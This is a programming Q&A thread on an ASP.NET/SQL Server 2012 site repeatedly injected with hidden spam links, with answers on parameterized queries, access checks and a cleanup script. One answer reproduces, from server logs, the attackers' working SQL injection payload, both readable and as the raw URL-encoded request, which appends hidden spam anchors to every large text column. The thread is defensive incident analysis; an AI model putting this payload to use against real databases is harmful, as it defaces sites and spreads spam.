# MSSQL Server injected with hidden spam links, any ultimate solution?

Tags: asp.net, sql-server, database, sql-injection, spam

I'm using MSSQL Server 2012. The websites connected to this database is developed by ASP.NET C# 2012.
Recently my database been hacked or injected by spam links, and they all start the same

```
<div style="display:none"> .....
```

with some help I made a function that cleans the updated fields, but the problem is after few days the same thing happened again!

I can keep cleaning the database, but I'm trying to find an ultimate solution to prevent this from happening for good.. any ideas?

- Note: I noticed most columns updated are text fields "nvarchar".

Comment: Do the columns that are receiving this input need to be able to accept HTML, or would plain text suffice?

Comment: Some of them yes, but not all of them

Answer (score 4, accepted):

Your issue is almost certainly a SQL injection vulnerability. Cleaning the database wont resolve this.

Look through your code for places where you are accepting user input unsanitized and generating dynamic SQL with it.

Here is a good discussion: https://www.acunetix.com/websitesecurity/sql-injection/

Comment: Even if the add/update in my code is inside my admin portal? which the login is secured and I changed it to parameterized queries??

Comment: Parameterized queries should resolve the issue, so that's strange. Are all queries parameterized? Specifically the ones which write to the varchar fields in question?

Comment: No, not all of them.. only in login pages. Should I make it in all insert/update statements?!

Comment: Preferably, yes, but it also sounds like there may be another attack vector available. I'd suggest changing your password immediately (both site and DB), and then start looking for security flaws. How many people have access to your admin portal? Do you have server logs available? Can you encrypt your web.config file? Anybody with direct access to your DB?

Comment: Okay I feel embarrassed.. I just found popup pages that insert and update to the DB and there's no check on the user privileges on these pages.

Comment: Thank you so much for your help, I'll fix it now and wait for couple days and see if it's gonna make a different.

Comment: It might be the privileges issue. But all you need is write access and an unparameterized query, and you are still exposed, so review the queries that the popup pages use.

Answer (score 5):

In my case, it was an SQL injection through non-validated URL request parameters, too.

Let's start with the obvious:

[image]

Interestingly enough (read: stupid enough), I had configured the same SQL Server user for several databases, resulting in not only the database of the vulnerable ASP.NET application was compromised but also other databases of non-vulnerable ASP.NET applications on the same server.

#### Cleanup

Here is a small SQL script that [searches through all tables of one database](https://stackoverflow.com/a/591991/107625) and outputs an [SQL query to cleanup the tables](https://stackoverflow.com/a/13639990/107625) in question:

```
DECLARE
    @search_string  VARCHAR(100),
    @table_name     SYSNAME,
    @table_id       INT,
    @column_name    SYSNAME,
    @sql_string     VARCHAR(2000)

SET @search_string = 'display:none' -- The spammy text to search for.

DECLARE tables_cur CURSOR FOR SELECT name, object_id FROM sys.objects WHERE type = 'U'

OPEN tables_cur

FETCH NEXT FROM tables_cur INTO @table_name, @table_id

WHILE (@@FETCH_STATUS = 0)
BEGIN
    DECLARE columns_cur CURSOR FOR SELECT name FROM sys.columns WHERE object_id = @table_id AND system_type_id IN (167, 175, 231, 239)

    OPEN columns_cur

    FETCH NEXT FROM columns_cur INTO @column_name
    WHILE (@@FETCH_STATUS = 0)
    BEGIN
        SET @sql_string = 'IF EXISTS (SELECT * FROM [' + @table_name + '] WHERE [' + @column_name + '] LIKE ''%' + @search_string + '%'') PRINT '' update [' + @table_name + '] set [' + @column_name + '] = substring([' + @column_name + '], 1, charindex(''''<'''', [' + @column_name + '])-1) where [' + @column_name + '] like ''''%<%'''''''
        --PRINT @sql_string
        EXECUTE(@sql_string)

        FETCH NEXT FROM columns_cur INTO @column_name
    END

    CLOSE columns_cur

    DEALLOCATE columns_cur

    FETCH NEXT FROM tables_cur INTO @table_name, @table_id
END

CLOSE tables_cur

DEALLOCATE tables_cur
```

This prints nothing for non-compromised databases and something like:

```
update [MyTable1] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable2] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable3] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
update [MyTable4] set [MyColumn] = substring([MyColumn], 1, charindex('<', [MyColumn])-1) where [MyColumn] like '%<%'
```

You can execute the generated SQLs after that.

Please note that it strips everything right from the very first `<`. This might not be appropriate for certain columns the intentionally contain Markup/HTML/XML.

So let's finish with the other obvious thing:

[image]

#### Injected SQL

Just for the records or if anyone is ever interested, here is the extracted effective SQL being used by the spammers:

```
declare @c cursor;
declare @d varchar(4000);

set @c=cursor for select 'update ['+TABLE_NAME+
    '] set ['+COLUMN_NAME+']=['+COLUMN_NAME+
    ']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''''
    +char(60)+''div style="display:none"''+char(62)+
    ''go ''+char(60)+''a href="http:''+char(47)+char(47)+
    ''blog.armanda.com''+ char(47)+''page''+char(47)+
    ''women-who-cheat-with-
    married-men.aspx"''+char(62)+case ABS(CHECKSUM(
    NewId()))%3 when 0 then ''why do husbands cheat'' 
    when 1 then ''reasons why husband cheat'' else 
    ''want my wife to cheat'' end +char(60)+char(47)+
    ''a''+char(62)+'' My wife cheated on me''+
    char(60)+char(47)+''div''+char(62)+'''' else '''' 
    end' FROM sysindexes AS i INNER JOIN sysobjects AS 
    o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS 
    ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and 
    DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 
    or CHARACTER_MAXIMUM_LENGTH=2147483647);

open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0 
begin 
    exec (@d);
    fetch next from @c into @d;
end;
close @c
```

I've inserted line breaks to enhance readability.

The raw URL, directly from the server logs, reads as following:

> /es/details.aspx,lid=15';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''go%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.armanda.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''women-who-cheat-with-married-men.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20do%20husbands%20cheat''%20when%201%20then%20''reasons%20why%20husband%20cheat''%20else%20''want%20my%20wife%20to%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20My%20wife%20cheated%20on%20me''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c--

Comment: This was very helpful. I used this to create a rewrite/redirect rule(s) to reject these types of attacks while we patch the vulnerability in the code.

Answer (score 0):

you will clean all the sql database tables `nvarchar` columns with this code

```
update table_name set column_name=SUBSTRING(column_name,0,
CharIndex('<div style=\"display:none\">',column_name)) 
where column_name like '%<div style=\"display:none\">%'
```